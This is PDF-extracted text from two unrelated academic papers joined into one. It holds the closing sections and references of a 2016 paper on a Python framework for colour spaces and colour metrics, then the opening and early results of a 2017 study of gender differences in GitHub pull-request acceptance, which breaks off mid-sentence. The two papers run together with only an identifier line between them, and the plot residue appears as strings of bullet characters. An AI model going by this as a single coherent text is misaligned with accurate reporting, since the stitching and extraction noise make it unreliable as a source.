of by the colour space class hierarchy without the user having to interfere. Colour metrics, tensors and statistics The four remaining modules, metric, tensor, statistics, and misc contain separate functions (not part of the class hierarchy) for computing various properties of colour data, colour transforms, and sets of these. The metric module has functions for computing the most common colour metrics, such as the standard CIE 1Eab and 1Euv metrics, CIEDE2000 (Luo, Cui & Rigg, 2001), the different versions of the DIN99 metric as described by Cui et al. (2002), the log-compressed OSA-UCS metric 1EE by Oleari, Melgosa & Huertas (2009), as well as a general Euclidean distance and the Poincare disk metric developed in Reference (Farup, 2014) in any colour space. All these functions take two colour data objects of the same size as arguments, and return an N-vector of colour differences. The tensor module has functions for computing the metric tensors corresponding to the metrics in the metric package. The functions take one colour Data object as argument, and Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 7/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 returns the corresponding TensorData object. The statistics module contains functions for calculating various statistics of colour metric data, such as the STRESS measure (García et al., 2007) and Pant’s R-values (Pant & Farup, 2012; Pant, Farup & Melgosa, 2013). The misc module contains miscellaneous supporting functions. Computational complexity The framework has been implemented using NumPy (Oliphant, 2007) ndarrays, and all operations for colour and metric conversion are vectorised. Thus, all the real computations take place using the highly optimised underlying libraries for matrices, such as LAPACK (Anderson et al., 1999) etc. No loops over individual colour data are implemented in the high-level language. Thus, there are only two sources of computational overhead by using the framework. First, there are the function calls associated with computing the transformations between a given colour space and its bases all the way back to the CIEXYZ colour space. These function calls will only take place once per transformation call. This can be a significant overhead when the data set consists of only one or very few data points, but then the computation is very quick anyway. For bigger colour data sets, such as images, this will represent only very few function calls (given by the number of steps in the transformation from CIEXYZ to the given space), and thus be negligible in comparison with the real computation, which takes place at the highly optimised low-level code. Secondly, all colour and metric conversions go through the CIEXYZ colour space. When converting between two colour spaces based on a common basis other than CIEXYZ, an unneccesary conversion back and forth between this common basis and CIEXYZ will inevitably take place. It would, in principle, be possible to eliminate this by advanced optimisation techniques, but since the computations are already fast (fractions of a second even for quite large images), and the goal of the framework has been ease of implementation rather than computational efficiency, this has not been prioritized. Not all of the operations in the statistics module are vectorised, although this would in principle also be possible. The reason for this is that they are mainly meant for colour research applications, and as such, they are not expected to be used in production. For the relevant use in research, data collection etc. will be much more time consuming than the actual computations, so computational efficiency has not been emphasized in this part of the framework. EXAMPLE APPLICATION In order to demonstrate the power of the proposed approach, a simple demo application is shown in Fig. 4. In this short code (less than a page), (i) a new colour space is implemented, (ii) individual colours, lists of colours and a colour image is converted to the new colour space, (iii) the tensorial data corresponding to the MacAdam ellipses is converted by the help of the Jacobian matrices of the transformation to the new space, and (iv) the colour difference between two images is computed as a Eucildean distance in the newly constructed colour space. These operations would normally require days of programming, but with the use of the proposed framework it is all achieved by a few lines of code. Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 8/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 Figure 4 Small demo of the colour package. In lines 3–6, the library is imported. In a real application, one would normally only import the colour package (import colour), and refer to the elements as, e.g., colour.space.TransformLinear etc., but here the specific classes, objects and functions needed are imported specifically, simply in order to reduce the size and improve the readability of the remaining code. The transformation to the IPT colour space (Ebner & Fairchild, 1998) is composed of a linear transform from XYZ followed by a gamma correction, followed by final linear Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 9/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 Figure 5 An image (A) and its gamut clipped version (B). Figure 6 The I (A), P (B), and T (C) planes of the image shown in Fig. 5A. Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 10/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 Figure 7 The MacAdam ellipses plotted in the PT-plane of the IPT colour space. Figure 8 Difference maps of the two images shown in Fig. 5 for 1Eab (A), 1E00 (B), and the Euclidean distance in the IPT colour space (C). transform. The code for constructing this colour space is given in lines 9–16 of Fig. 4. It should be noted that the programmer does not need to specify anything about the computation of the corresponding Jacobian matrices—everyting is taken care of by the constructors of the Transformation classes. Once the colour space is constructed, the Data class can use it for converting colours in various formats such as single data points—lines 19–20—giving [9.99987871e-01 1.16264986e-03 1.69020684e-06], Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 11/14 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.48 lists of colour points—lines 22–23—giving [[9.99987871e-01 1.16264986e-03 1.69020684e-06] [4.83120653e-01 5.61706973e-04 8.16583738e-07] [0.00000000e+00 0.00000000e+00 0.00000000e+00]], and even colour images (lines 25–26). The individual IPT colour planes of the image shown in Fig. 5A resulting from this (lines 27–29) are shown in Fig. 6. In order to demonstrate also the transformation of tensorial colour data, the code in lines 32–37 loads, transforms, and plots the MacAdam ellipses (MacAdam, 1942) in the PT-plane of the IPT space. The latter includes the tedious process of computing the transformation of the corresponding metric tensors according to Eq. (10). The resulting plot is shown in Fig. 7. Similarly, the colour.metric module can compute colour differences of colour data in any format, including images. For example, the code in lines 41–43 of Fig. 4 computes the difference maps of the two images shown in Fig. 5 for 1Eab, 1E00 and the Euclidean distance in the newly implemented IPT colour space. The results are shown in Fig. 8. Please note that the entire code used to generate Figs. 5–8 is shown in Fig. 4. CONCLUSION An object-oriented computational framework for colour metrics and colour has been designed and implemented in Python. The framework strongly simplifies the implementation of new colour spaces for transfroming colour data and as well as tensorial colour metric data between the various colour spaces without compromising too much on the computational complexity. The code is freely available at GitHub (https://github.com/ifarup/colourspace). Future extensions could include ICC support, computation geodesics based on the colour metrics (Pant & Farup, 2013), computation and representation of colour gamuts (Bakke, Farup & Hardeberg, 2010), as well as gamut mapping algorithms (Alsam & Farup, 2009) in any colour space, and under any colour metric. ADDITIONAL INFORMATION AND DECLARATIONS Funding This research has been supported by the Research Council of Norway through project no. 221073 ‘HyPerCept – Colour and quality in higher dimensions’. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: Research Council of Norway: 221073. Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 12/14 https://peerj.com https://github.com/ifarup/colourspace http://dx.doi.org/10.7717/peerj-cs.48 Competing Interests The author declares there are no competing interests. Author Contributions • Ivar Farup conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: https://github.com/ifarup/colourspace. REFERENCES Alsam A, Farup I. 2009. Colour gamut mapping as a constrained variational problem. In: Salberg A-B, Hardeberg JY, Jenssen R, eds. Image analysis, 16th Scandinavian con- ference, SCIA 2009. Lecture notes in computer science, vol. 5575. Berlin, Heidelberg: Springer, 109–117. Anderson E, Bai Z, Bischof C, Blackford S, Demmel J, Dongarra J, Du Croz J, Green- baum A, Hammarling S, McKenney A, Sorensen D. 1999. LAPACK users’ guide. 3rd edition. Philadelphia: Society for Industrial and Applied Mathematics. Bakke AM, Farup I, Hardeberg JY. 2010. Evaluation of algorithms for the determi- nation of color gamut boundaries. Journal of Imaging Science and Technology 54(5):050502–050511 DOI 10.2352/J.ImagingSci.Technol.2010.54.5.050502. Beall MW, Shephard MS. 1999. An object-oriented framework for reliable numerical simulations. Engineering with Computers 15(1):61–72 DOI 10.1007/s003660050005. Cai X, Langtangen HP, Moe H. 2005. On the performance of the Python programming language for serial and parallel scientific computations. Scientific Programming 13(1):31–56 DOI 10.1155/2005/619804. Cui G, Luo MR, Rigg B, Roesler G, Witt K. 2002. Uniform colour spaces based on the DIN99 colour-difference formula. Color Research & Application 27(4):282–290 DOI 10.1002/col.10066. Deza MM, Deza E. 2009. Encyclopedia of distances. Berlin, Heidelberg: Springer. Ebner F, Fairchild MD. 1998. Development and testing of a color space (IPT) with improved hue uniformity. In: The sixth color imaging conference: color science, systems and applications. Springfield: Society for Imaging Science and Technology, 8–13. Farup I. 2014. Hyperbolic geometry for colour metrics. Optics Express 22(10):12369–12378 DOI 10.1364/OE.22.012369. García PA, Huertas R, Melgosa M, Cui G. 2007. Measurement of the relationship between perceived and computed color differences. Journal of the Optical Society of America A 24(7):1823–1829 DOI 10.1364/JOSAA.24.001823. Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 13/14 https://peerj.com https://github.com/ifarup/colourspace http://dx.doi.org/10.2352/J.ImagingSci.Technol.2010.54.5.050502 http://dx.doi.org/10.1007/s003660050005 http://dx.doi.org/10.1155/2005/619804 http://dx.doi.org/10.1002/col.10066 http://dx.doi.org/10.1002/col.10066 http://dx.doi.org/10.1364/OE.22.012369 http://dx.doi.org/10.1364/OE.22.012369 http://dx.doi.org/10.1364/JOSAA.24.001823 http://dx.doi.org/10.7717/peerj-cs.48 Lenz R, Carmona PL, Meer P. 2007. The hyperbolic geometry of illumination-induced chromaticity changes. In: Computer vision and pattern recognition, 2007. CVPR’07. IEEE conference on. Piscataway: IEEE, 1–6. Luo MR, Cui G, Rigg B. 2001. The development of the CIE 2000 colour-difference formula: CIEDE2000. Color Research & Application 26(5):340–350 DOI 10.1002/col.1049. MacAdam DL. 1942. Visual sensitivities to color differences in daylight. Journal of the Optical Society of America A 32(5):247–274 DOI 10.1364/JOSA.32.000247. Moroney N, Fairchild MD, Hunt RWG, Li C, Luo MR, Newman T. 2002. The CIECAM02 color appearance model. In: Proceedings of IS & T and SID’s 10th color imaging conference: color science and engineering: systems, technologies, applications. Springfield: Society for Imaging Science and Technology, 23–27. Oleari C, Melgosa M, Huertas R. 2009. Euclidean color-difference formula for small– medium color differences in log-compressed OSA-UCS space. Journal of the Optical Society of America A 26(1):121–134. Oliphant TE. 2007. Python for scientific computing. Computing in Science & Engineering 9:10–20 DOI 10.1109/MCSE.2007.58. Pant DR, Farup I. 2012. Riemannian formulation and comparison of color difference formulas. Color Research & Application 37(6):429–440 DOI 10.1002/col.20710. Pant DR, Farup I. 2013. Geodesic calculation of color difference formulas and comparison with the Munsell color order system. Color Research & Application 38(4):259–266 DOI 10.1002/col.20751. Pant DR, Farup I, Melgosa M. 2013. Analysis of three Euclidean color-difference formulas for predicting the average RIT-DuPont color-difference ellipsoids. In: Proceedings of AIC2013—12th international AIC congress, 537–540. Plataniotis KN, Venetsanopoulos AN. 2000. Color image processing and applications. New York: Springer. Van Rossum G, Drake Jr FL. 1995. Python reference manual. Amsterdam: Centrum voor Wiskunde en Informatica Amsterdam. Wyszecki G, Stiles WS. 1982. Color science—concepts and methods, quantitative data and formulae. New York: John Wiley & Sons. Farup (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.48 14/14 https://peerj.com http://dx.doi.org/10.1002/col.1049 http://dx.doi.org/10.1364/JOSA.32.000247 http://dx.doi.org/10.1109/MCSE.2007.58 http://dx.doi.org/10.1002/col.20710 http://dx.doi.org/10.1002/col.20751 http://dx.doi.org/10.7717/peerj-cs.48 work_ptt4wjnlafbitn5ku5cpz22awy ---- Submitted 18 August 2016 Accepted 28 March 2017 Published 1 May 2017 Corresponding author Emerson Murphy-Hill, emerson@csc.ncsu.edu Academic editor Arie van Deursen Additional Information and Declarations can be found on page 27 DOI 10.7717/peerj-cs.111 Copyright 2017 Terrell et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Gender differences and bias in open source: pull request acceptance of women versus men Josh Terrell1, Andrew Kofink2, Justin Middleton2, Clarissa Rainear2, Emerson Murphy-Hill2, Chris Parnin2 and Jon Stallings3 1 Department of Computer Science, California Polytechnic State University—San Luis Obispo, San Luis Obispo, CA, United States 2 Department of Computer Science, North Carolina State University, Raleigh, NC, United States 3 Department of Statistics, North Carolina State University, Raleigh, NC, United States ABSTRACT Biases against women in the workplace have been documented in a variety of studies. This paper presents a large scale study on gender bias, where we compare acceptance rates of contributions from men versus women in an open source software community. Surprisingly, our results show that women’s contributions tend to be accepted more often than men’s. However, for contributors who are outsiders to a project and their gender is identifiable, men’s acceptance rates are higher. Our results suggest that although women on GitHub may be more competent overall, bias against them exists nonetheless. Subjects Human-Computer Interaction, Social Computing, Programming Languages, Software Engineering Keywords Gender, Bias, Open source, Software development, Software engineering INTRODUCTION In 2012, a software developer named Rachel Nabors wrote about her experiences trying to fix bugs in open source software (http://rachelnabors.com/2012/04/of-github-and-pull- requests-and-comics/). Nabors was surprised that all of her contributions were rejected by the project owners. A reader suggested that she was being discriminated against because of her gender. Research suggests that, indeed, gender bias pervades open source. In Nafus’ interviews with women in open source, she found that ‘‘sexist behavior is...as constant as it is extreme’’ (Nafus, 2012). In Vasilescu and colleagues’ study of Stack Overflow, a question and answer community for programmers, they found ‘‘a relatively ‘unhealthy’ community where women disengage sooner, although their activity levels are comparable to men’s’’ (Vasilescu, Capiluppi & Serebrenik, 2014). These studies are especially troubling in light of recent research which suggests that diverse software development teams are more productive than homogeneous teams (Vasilescu et al., 2015). Nonetheless, in a 2013 survey of the more than 2000 open source developers who indicated a gender, only 11.2% were women (Arjona-Reina, Robles & Dueas, 2014). How to cite this article Terrell et al. (2017), Gender differences and bias in open source: pull request acceptance of women versus men. PeerJ Comput. Sci. 3:e111; DOI 10.7717/peerj-cs.111 https://peerj.com mailto:emerson@csc.ncsu.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.111 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://rachelnabors.com/2012/04/of-github-and-pull-requests-and-comics/ http://rachelnabors.com/2012/04/of-github-and-pull-requests-and-comics/ http://dx.doi.org/10.7717/peerj-cs.111 Figure 1 GitHub user ‘JustinAMiddleton’ makes a pull request; the repository owner ‘akofink’ accepts it by merging it. The changes proposed by JustinAMiddleton are now incorporated into the project. This article presents an investigation of gender bias in open source by studying how software developers respond to pull requests, proposed changes to a software project’s code, documentation, or other resources. A successfully accepted, or ‘merged,’ example is shown in Fig. 1. We investigate whether pull requests are accepted at different rates for self-identified women compared to self-identified men. For brevity, we will call these developers ‘women’ and ‘men,’ respectively. Our methodology is to analyze historical GitHub data to evaluate whether pull requests from women are accepted less often. While other open source communities exist, we chose to study GitHub because it is the largest (Gousios et al., 2014), claiming to have over 12 million collaborators across 31 million software repositories (https://github.com/about/press). The main contribution of this paper is an examination of gender differences and bias in the open source software community, enabled by a novel gender linking technique that Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 2/30 https://peerj.com https://github.com/about/press http://dx.doi.org/10.7717/peerj-cs.111 associates more than 1.4 million community members to self-reported genders. To our knowledge, this is the largest scale study of gender bias to date in open source communities. RELATED WORK A substantial part of activity on GitHub is done in a professional context, so studies of gender bias in the workplace are relevant. Because we cannot summarize all such studies here, we instead turn to Davison and Burke’s meta-analysis of 53 papers, each studying between 43 and 523 participants, finding that male and female job applicants generally received lower ratings for opposite-sex-type jobs (e.g., nurse is a female sex-typed job, whereas carpenter is male sex-typed) (Davison & Burke, 2000). The research described in Davison and Burke’s meta-analysis can be divided into experiments and field studies. Experiments attempt to isolate the effect of gender bias by controlling for extrinsic factors, such as level of education. For example, Knobloch- Westerwick, Glynn & Huge (2013) asked 243 scholars to read and evaluate research paper abstracts, then systematically varied the gender of each author; overall, scholars rated papers with male authors as having higher scientific quality. In contrast to experiments, field studies examine existing data to infer where gender bias may have occurred retrospectively. For example, Roth and colleagues’ meta-analysis of such studies, encompassing 45,733 participants, found that while women tend to receive better job performance ratings than men, women also tend to be passed up for promotion (Roth, Purvis & Bobko, 2012). Experiments and retrospective field studies each have advantages. The advantage of experiments is that they can more confidently infer cause and effect by isolating gender as the predictor variable. The advantage of retrospective field studies is that they tend to have higher ecological validity because they are conducted in real-world situations. In this paper, we use a retrospective field study as a first step to quantify the effect of gender bias in open source. Several other studies have investigated gender in the context of software development. Burnett and colleagues (2010) analyzed gender differences in 5 studies that surveyed or interviewed a total of 2,991 programmers; they found substantial differences in software feature usage, tinkering with and exploring features, and in self-efficacy. Arun & Arun (2002) surveyed 110 Indian software developers about their attitudes to understand gender roles and relations but did not investigate bias. Drawing on survey data, Graham and Smith demonstrated that women in computer and math occupations generally earn only about 88% of what men earn (Graham & Smith, 2005). Lagesen contrasts the cases of Western versus Malaysian enrollment in computer science classes, finding that differing rates of participation across genders results from opposing perspectives of whether computing is a ‘‘masculine’’ profession (Lagesen, 2008). The present paper builds on this prior work by looking at a larger population of developers in the context of open source communities. Some research has focused on differences in gender contribution in other kinds of virtual collaborative environments, particularly Wikipedia. Antin and colleagues (2011). followed the activity of 437 contributors with self-identified genders on Wikipedia and found that, of the most active users, men made more frequent contributions while women made larger contributions. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 3/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 There are two gender studies about open source software development specifically. The first study is Nafus’ anthropological mixed-methods study of open source contributors, which found that ‘‘men monopolize code authorship and simultaneously de-legitimize the kinds of social ties necessary to build mechanisms for women’s inclusion’’, meaning values such as politeness are favored less by men (Nafus, 2012). The other is Vasilescu and colleagues’ (2015) study of 4,500 GitHub contributors, where they inferred the contributors’ gender based on their names and locations (and validated 816 of those genders through a survey); they found that gender diversity is a significant and positive predictor of productivity. Our work builds on this by investigating bias systematically and at a larger scale. GENERAL METHODOLOGY Our main research question was To what extent does gender bias exist when pull requests are judged on GitHub? We answer this question from the perspective of a retrospective cohort study, a study of the differences between two groups previously exposed to a common factor to determine its influence on an outcome (Doll, 2001). One example of a similar retrospective cohort study was Krumholz and colleagues’ (1992). review of 2,473 medical records to determine whether there exists gender bias in the treatment of men and women for heart attacks. Other examples include the analysis of 6,244 school discipline files to evaluate whether gender bias exists in the administration of corporal punishment (Gilbert, Williams & Lundberg, 1994) and the analysis of 1,851 research articles to evaluate whether gender bias exists in the peer reviewing process for the Journal of the American Medical Association (Shaw & Braden, 1990). To answer the research question, we examined whether men and women are equally likely to have their pull requests accepted on GitHub, then investigated why differences might exist. While the data analysis techniques we used were specific to each approach, there were several commonalities in the data sets that we used, as we briefly explain below. For the sake of maximizing readability of this paper, we describe our methodology in detail in the ‘Material and Methods’ Appendix. We started with a GHTorrent (Gousios, 2013) dataset that contained public data on pull requests from June 7, 2010 to April 1, 2015, as well as data about users and projects. We then augmented this GHTorrent data by mining GitHub’s webpages for information about each pull request status, description, and comments. GitHub does not request information about users’ genders. While previous approaches have used gender inference (Vasilescu, Capiluppi & Serebrenik, 2014; Vasilescu et al., 2015), we took a different approach—linking GitHub accounts with social media profiles where the user has self-reported gender. Specifically, we extract users’ email addresses from GHTorrent, look up that email address on the Google+ social network, then, if that user has a profile, extract gender information from these users’ profiles. Out of 4,037,953 Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 4/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 GitHub user profiles with email addresses, we were able to identify 1,426,127 (35.3%) of them as men or women through their public Google+ profiles. We are the first to use this technique, to our knowledge. We recognize that our gender linking approach raises privacy concerns, which we have taken several steps to address. First, this research has undergone human subjects IRB review, research that is based entirely on publicly available data. Second, we have informed Google about our approach in order to determine whether they believe our approach to linking email addresses to gender is a privacy violation of their users; they responded that it is consistent with Google’s terms of service (https://sites.google.com/site/ bughunteruniversity/nonvuln/discover-your-name-based-on-e-mail-address). Third, to protect the identities of the people described in this study to the extent possible, we do not plan to release our data that links GitHub users to genders. RESULTS We describe our results in this section; data is available in Supplemental Files. Are women’s pull requests less likely to be accepted? We hypothesized that pull requests made by women are less likely to be accepted than those made by men. Prior work on gender bias in hiring—that a job application with a woman’s name is evaluated less favorably than the same application with a man’s name (Moss-Racusin et al., 2012)—suggests that this hypothesis may be true. To evaluate this hypothesis, we looked at the pull status of every pull request submitted by women compared to those submitted by men. We then calculate the merge rate and corresponding confidence interval, using the Clopper–Pearson exact method (Clopper & Pearson, 1934), and find the following: Gender Open Closed Merged Merge Rate 95% Confidence interval Women 8,216 21,890 111,011 78.7% [78.45%,78.88%] Men 150,248 591,785 2,181,517 74.6% [74.57%,74.67%] The hypothesis is not only false, but it is in the opposite direction than expected; women tend to have their pull requests accepted at a higher rate than men! This difference is statistically significant (χ2(df =1,n=3,064,667)=1,170,p<.001). What could explain this unexpected result? Open source effects Perhaps our GitHub data are not representative of the open source community; while all projects we analyzed were public, not all of them are licensed as open source. Nonetheless, if we restrict our analysis to just projects that are explicitly licensed as open source, women continue to have a higher acceptance rate (χ2(df =1,n=1,424,127)=347,p<.001): Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 5/30 https://peerj.com https://sites.google.com/site/bughunteruniversity/nonvuln/discover-your-name-based-on-e-mail-address https://sites.google.com/site/bughunteruniversity/nonvuln/discover-your-name-based-on-e-mail-address http://dx.doi.org/10.7717/peerj-cs.111#supplemental-information http://dx.doi.org/10.7717/peerj-cs.111 Gender Open Closed Merged Merge Rate 95% Confidence Interval Women 1,573 7,669 32,944 78.1% [77.69%,78.49%] Men 60,476 297,968 1,023,497 74.1% [73.99%,74.14%] Insider effects Perhaps women’s high acceptance rate is because they are already well known in the projects they make pull requests in. Pull requests can be made by anyone, including both insiders (explicitly authorized owners and collaborators) and outsiders (other GitHub users). If we exclude insiders from our analysis, the women’s acceptance rate (62.1% [61.65%,62.53%]) continues to be significantly higher than men’s (60.7% [60.65%,60.82%]) (χ2(df =1,n=1,372,834)=35,p<.001). Experience effects Perhaps only a few highly successful and prolific women, responsible for a substantial part of overall success, are skewing the results. To test this, we calculated the pull request acceptance rate for each woman and man with 5 or more pull requests, then found the average acceptance rate across those two groups. The results are displayed in Fig. 2. We notice that women tend to have a bimodal distribution, typically being either very successful (>90% acceptance rate) or unsuccessful (<10%). But these data tell the same story as the overall acceptance rate; women are more likely than men to have their pull requests accepted. Why might women have a higher acceptance rate than men, given the gender bias documented in the literature? In the remainder of this section, we will explore this question by evaluating several hypotheses that might explain the result. Do women’s pull request acceptance rates start low and increase over time? One plausible explanation is that women’s first few pull requests get rejected at a disproportionate rate compared to men’s, so they feel dejected and do not make future pull requests. This explanation is supported by Reagle’s account of women’s participation in virtual collaborative environments, where an aggressive argument style is necessary to justify one’s own contributions, a style that many women may find to be not worthwhile (Reagle, 2012). Thus, the overall higher acceptance rate for women would be due to survivorship bias within GitHub; the women who remain and do the majority of pull requests would be better equipped to contribute, and defend their contributions, than men. Thus, we might expect that women have a lower acceptance rate than men for early pull requests but have an equivalent acceptance rate later. To evaluate this hypothesis, we examine pull request acceptance rate over time, that is, the mean acceptance rate for developers on their first pull request, second pull request, and so on. Figure 3 displays the results. Orange points represent the mean acceptance rate for women, and purple points represent acceptance rates for men. Shaded regions indicate the pointwise 95% Clopper–Pearson confidence interval. Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 6/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 0% 10% 20% 30% 40% 0% 25% 50% 75% 100% % o f W o m e n Women 0% 10% 20% 30% 40% 0% 25% 50% 75% 100% % o f M e n Men Acceptance Rate A B Figure 2 Histogram of mean acceptance rate per developer for women (mean 76.9%, median 84.9%) and men (mean 71.0%, median 76.0%). While developers making their initial pull requests do get rejected more often, women generally still maintain a higher rate of acceptance throughout. The acceptance rate of women tends to fluctuate at the right of the graph, because the acceptance rate is affected by only a few individuals. For instance, at 128 pull requests, only 103 women are represented. Intuitively, where the shaded region for women includes the corresponding data point for men, the reader can consider the data too sparse to conclude that a substantial difference exists between acceptance rates for women and men. Nonetheless, between 1 and 64 pull requests, women’s higher acceptance rate remains. Thus, the evidence casts doubt on our hypothesis. Are women focusing their efforts on fewer projects? One possible explanation for women’s higher acceptance rates is that they are focusing their efforts more than men; perhaps their success is explained by doing pull requests on few projects, whereas men tend to do pull requests on more projects. First, the data do Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 7/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ●● ●● ●● ●● ●●● ●●● ●●● ●●● ●● ●●● ●●●●●● ●●●●●●●●●● ●●●● ●●●●●● ●●● ●●●●●● ●●●●●● ●●●●●●●● ●●●●●●● ●●●●● ●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●●● ●●● ● ● ●● ●● ●● ●● ●●● ● ●●● ● ●●●● ● ● ● ● ●● ●● ●●● ● ●● ● ●● ●● ●●● ●● ●●●●●● ●●● ●● ●●● ●● ●●● ● ● ●● ● ●●●●● ● ● ●● ● ●● ● ●●●● ●●●●●● ●●● 60% 70% 80% 90% 1 2 4 8 16 32 64 128 Pull Requests A cc e p ta n ce R a te ●● ●● Women Men Figure 3 Pull request acceptance rate over time. suggest that women tend to contribute to fewer projects than men. While the median number of projects contributed to via pull request is 1 for both genders (that is, the 50th percentile of developers); at the 75th percentile it is 2 for women and 3 for men, and at the 90th percentile it is 4 for women and 7 for men. But the fact that women tend to contribute to fewer projects does not explain why women tend to have a higher acceptance rate. To see why, consider Fig. 4; on the y axis is mean acceptance rate by gender, and on the x axis is number of projects contributed to. When contributing to between 1 and 5 projects, women have a higher acceptance rate as they contribute to more projects. Beyond 5 projects, the 95% confidence interval indicates women’s data are too sparse to draw conclusions confidently. Are women making pull requests that are more needed? Another explanation for women’s pull request acceptance rate is that, perhaps, women disproportionately make contributions that projects need more specifically. What makes a contribution ‘‘needed’’ is difficult to assess from a third-party perspective. One way is to look at which pull requests link to issues in projects’ GitHub issue trackers. If a pull request references an issue, we consider it to serve a more specific and recognized need than an otherwise comparable one that does not. To support this argument with data, we randomly selected 30 pull request descriptions that referenced issues; in 28 cases, the reference was Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 8/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 60% 70% 80% 90% 1 2 3 4 5 6 7 8 9 10 Projects Contributed To A cc e p ta n ce R a te ●● ●● Women Men Figure 4 Pull request acceptance rate by number of projects contributed to. an attempt to fix all or part of an issue. Based on this high probability, we can assume that when someone references an issue in a pull request description, they usually intend to fix a specific problem in the project. Thus, if women more often submit pull requests that address an documented need and this is enough to improve acceptance rates, we would expect that these same requests are more often linked to issues. We evaluate this hypothesis by parsing pull request descriptions and calculating the percentage of pulls that reference an issue. To eliminate projects that do not use issues or do not customarily link to them in pull requests, we analyze only pull requests in projects that have at least one linked pull request. Here are the results: Gender Without reference With reference % 95% Confidence Interval Women 33,697 4,748 12.4% [12.02%,12.68%] Men 1,196,519 182,040 13.2% [13.15%,13.26%] This data show a statistically significant difference (χ2(df =1,n=1,417,004)=24, p<.001). Contrary to the hypothesis, women are slightly less likely to submit a pull request that mentions an issue, suggesting that women’s pull requests are less likely to fulfill an documented need. Note that this does not imply women’s pull requests are less valuable, Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 9/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 but instead that the need they fulfill appears less likely to be recognized and documented before the pull request was created. Regardless, the result suggests that women’s increased success rate is not explained by making more specifically needed pull requests. Are women making smaller changes? Maybe women are disproportionately making small changes that are accepted at a higher rate because the changes are easier for project owners to evaluate. This is supported by prior work on pull requests suggesting that smaller changes tend to be accepted more than larger ones (Gousios, Pinzger & Deursen, 2014). We evaluated the size of the contributions by analyzing lines of code, modified files, and number of commits included. The following table lists the median and mean lines of code added, removed, files changed, and commits across 3,062,677 pull requests: Lines added Lines removed Files changed Commits Women Median 29 5 2 1 Mean 1,591 597 29.2 5.2 Men Median 20 4 2 1 Mean 1,003 431 26.8 4.8 t-test Statistic 5.74 3.03 1.52 7.36 df 146,897 149,446 186,011 155,643 p <.001 0.0024554 0.12727 <.001 CI [387.3,789.3] [58.3,272] [−0.7,5.4] [0.3,0.5] The bottom of this chart includes Welch’s t-test statistics, comparing women’s and men’s metrics, including 95% confidence intervals for the mean difference. For three of four measures of size, women’s pull requests are significantly larger than men’s. One threat to this analysis is that lines added or removed may exaggerate the size of a change whenever a refactoring is performed. For instance, if a developer moves a 1,000-line class from one folder to another, even though the change may be relatively benign, the change will show up as 1,000 lines added and 1,000 lines removed. Although this threat is difficult to mitigate definitively, we can begin to address it by calculating the net change for each pull request as the number of added lines minus the number of removed lines. Here is the result: Net lines changed Women Median 11 Mean 995 Men Median 7 Mean 571 t-test Statistic 4.06 df 148,010 p <.001 CI [218.9,627.4] Terrell et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.111 10/30 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.111 This difference is also statistically significant. So even in the face of refactoring, the conclusion holds: women make pull requests that add and remove more lines of code, and contain more commits. This is consistent with larger changes women make on Wikipedia (Antin et al., 2011). Are women’s pull requests more successful when contributing code? One potential explanation for why women get their pull requests accepted more often is that the kinds of changes they make are different. For instance, changes to HTML could be more likely to be accepted than changes to C code, and if women are more likely to change HTML, this may explain our results. Thus, if we look only at acceptance rates of pull requests that make changes to program code, women’s high acceptance rates might disappear. For this, we define program code as files that have an extension that corresponds to a Turing-complete programming language. We categorize pull requests as belonging to a single type of source code change when the majority of lines modified were to a corresponding file type. For example, if a pull request changes 10 lines in .js (javascript) files and 5 lines in .html files, we include that pull request and classify it as a .js change. Figure 5 shows the results for the 10 most common programming language files (Fig. 5A) and the 10 most common non-programming language files (Fig. 5B). Each pair of bars summarizes pull requests classified as part of a programming language file extension, where the height of each bar represents the acceptance rate and each bar contains a 95% Clopper–Pearson confidence interval. An asterisk (*) next to a language indicates a statistically significant difference between men and women for that language using a chi-squared test, after a Benjamini–Hochberg correction (Benjamini & Hochberg, 1995) to control for false discovery. Overall, we observe 